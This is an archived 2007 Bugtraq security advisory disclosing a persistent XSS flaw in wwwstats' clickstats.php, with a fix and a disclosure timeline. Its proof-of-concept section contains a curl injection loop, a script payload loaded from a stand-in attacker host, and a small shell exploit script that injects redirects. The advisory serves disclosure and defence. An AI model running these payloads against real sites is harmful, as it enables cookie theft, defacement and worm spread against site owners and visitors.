lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <47592F27.6030000@isecauditors.com>
Date: Fri, 07 Dec 2007 12:31:51 +0100
From: ISecAuditors Security Advisories <advisories@...cauditors.com>
To: bugtraq@...urityfocus.com
Subject: [ISecAuditors Security Advisories]  wwwstats is vulnerable to Persistent
 XSS

=============================================
INTERNET SECURITY AUDITORS ALERT 2007-004
- Original release date: November 7th, 2007
- Last revised:  December 7th, 2007
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
=============================================

I. VULNERABILITY
-------------------------
wwwstats is vulnerable to Persistent XSS

II. BACKGROUND
-------------------------
wwwstats is a very widely used Web traffic analyser, that registers in
a database the user agents, referers, downloads, etc ..

III. DESCRIPTION
-------------------------
Is possible to inject HTML and JavaScript to the database by calling
directly the clickstats.php code. This would mean web defacing, steal
admin sessions, web redirecting and WSS Worms.

To bypass the first 'if', is necessary to fill the HTTP Referer field
with something, and inject the link to the database by the link get
parameter.

An attacker can inject using the link parameter or the useragent field
a script which will steal admin's cookies, or make a deface, or
anything else...

If magic quotes are configured at php.ini, there is no problem, in
javascript \'test\' is interpreted as 'test'.

IV. PROOF OF CONCEPT
-------------------------
Controlling the iterations number, is possible to do the injection in
the ranking position you want:

 while [ 1 ]; do
   curl
'http://web.com/wwwstats/clickstats.php?link=<script>XXXX</scrip>' -e
'xxx'; done

Also is possible to attack by -A 'attack'

A payload can be:

  <script scr='http://evilsite.com/XSSWorm.js'></script>


------------Exploit------------
#!/bin/sh
#jolmos (at) isecauditors (dot) com

if [ $# -ne 4 ]
then
     echo "Usage:   $0 <target>
     <html or javascript to inject in downloads> <ranking position>"
     echo "Example: $0 http://www.victym.com/wwwstats
     <script>window.location="http://www.evilhost.com"</script> 100"
     exit
fi

echo 'Attacking, wait a moment'
for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done
--------------------------------

V. BUSINESS IMPACT
-------------------------
A deface or redirection can damage the corporation image.

VI. SYSTEMS AFFECTED
-------------------------
wwwstats v3.21 and prior (all)

VII. SOLUTION
-------------------------
Sanitize the inputs. Update to version 3.22.

VIII. REFERENCES
-------------------------
http://www.timeprog.com/wwwstats/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
November 07, 2007: Initial release
November 09, 2007: Added POC

XI. DISCLOSURE TIMELINE
-------------------------
November 07, 2007: Vulnerability acquired by Jesus Olmos Gonzalez
                   Internet Security Auditors (www.isecauditors.com)
November 08, 2007: Developer contacted
November 08, 2007: Response and correction started.
November 26, 2007: Update Available.
December 07, 2007: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ